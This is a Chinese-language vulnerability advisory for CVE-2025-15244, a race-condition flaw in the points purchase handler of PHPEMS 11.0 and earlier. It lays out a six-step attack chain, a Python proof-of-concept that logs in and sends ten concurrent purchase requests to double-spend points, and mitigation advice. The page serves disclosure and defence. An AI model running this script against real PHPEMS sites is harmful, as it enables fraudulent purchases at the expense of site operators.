CVE-2025-15244 PHPEMS积分购买竞态条件漏洞

漏洞信息

漏洞编号

CVE-2025-15244

漏洞类型

Race Condition（竞态条件）

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPEMS

漏洞概述

CVE-2025-15244是PHPEMS系统中发现的一个竞态条件漏洞。该漏洞存在于PHPEMS的积分购买请求处理组件（Purchase Request Handler）中。攻击者可以利用多线程并发请求的特性，在积分购买过程中产生竞态条件，从而可能在短时间内多次消耗相同积分购买同一商品，或者在积分扣除和商品发放之间存在时间窗口内实施攻击。该漏洞的CVSS评分为3.7，属于低危级别，但由于攻击复杂度较高且利用难度较大，需要攻击者具备精确的时序控制能力。漏洞已于2025年12月30日公开披露，攻击者可从远程发起攻击，无需认证和用户交互即可尝试利用此漏洞。

技术细节

该漏洞属于经典的TOCTOU（Time-of-check to Time-of-use）竞态条件漏洞。在PHPEMS的Purchase Request Handler中，当用户发起积分购买请求时，系统会执行以下步骤：1）检查用户积分余额是否充足；2）扣除用户积分；3）发放商品或服务。然而，在步骤1和步骤2之间存在一个时间窗口，攻击者可以通过并发发送多个购买请求来绕过积分检查。由于数据库事务处理和业务逻辑之间的时序问题，同一用户可能在积分余额不足的情况下成功完成多次购买操作。攻击者需要构造精确的并发请求，通过多线程或脚本同时发送多个购买请求，利用服务器处理请求的时间差来实现积分的重复使用或超额购买。此漏洞影响PHPEMS 11.0及以下版本。

攻击链分析

STEP 1

步骤1

攻击者注册PHPEMS账号并获取足够的积分余额

STEP 2

步骤2

攻击者构造并发购买请求脚本，设置多个线程同时发送购买请求

STEP 3

步骤3

多个请求同时到达服务器，在积分检查和扣减之间产生竞态条件时间窗口

STEP 4

步骤4

系统对多个请求分别进行积分检查，由于并发执行，多个请求在检查时都看到足够的积分余额

STEP 5

步骤5

系统依次执行积分扣减操作，但由于并发请求，可能导致积分重复扣除或超额购买

STEP 6

步骤6

攻击者成功使用单次积分购买多个商品或服务，实现积分套利

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading
import time

# Target configuration
TARGET_URL = "http://target-server/phpems/"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"
ITEM_ID = "item_to_purchase"

# Login to get session
def login():
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(TARGET_URL + "index.php?user-login.html", data=login_data)
    return session

# Race condition purchase request
def purchase_item(session, item_id):
    purchase_data = {
        "itemid": item_id,
        "action": "buy"
    }
    try:
        response = session.post(TARGET_URL + "index.php?purchase-handler.html", data=purchase_data)
        return response.status_code, response.text
    except Exception as e:
        return None, str(e)

# Main attack function
def exploit():
    print("[*] Starting Race Condition Attack on CVE-2025-15244")
    session = login()
    
    threads = []
    num_threads = 10  # Number of concurrent requests
    
    # Launch concurrent purchase requests
    for i in range(num_threads):
        t = threading.Thread(target=purchase_item, args=(session, ITEM_ID))
        threads.append(t)
    
    # Start all threads simultaneously
    for t in threads:
        t.start()
    
    # Wait for all threads to complete
    for t in threads:
        t.join()
    
    print("[*] Attack completed. Check if items were purchased multiple times.")

if __name__ == "__main__":
    exploit()

影响范围

PHPEMS <= 11.0

防御指南

临时缓解措施

在官方修复版本发布之前，可通过以下方式临时缓解：1）关闭积分购买功能或设置为管理员审核模式；2）启用请求频率限制，阻止短时间内的大量并发请求；3）使用Web应用防火墙（WAF）配置异常请求检测规则；4）对关键业务操作实施额外的业务层校验和日志监控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15244
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15244
3 Details https://www.cvedetails.com/cve/CVE-2025-15244/
4 VulDB https://vuldb.com/cve/CVE-2025-15244
5 Link https://byebydoggy.github.io/post/2025/1229-phpems-points-race-condition-poc/
6 Link https://vuldb.com/?ctiid.338634
7 Link https://vuldb.com/?id.338634
8 Link https://vuldb.com/?submit.725727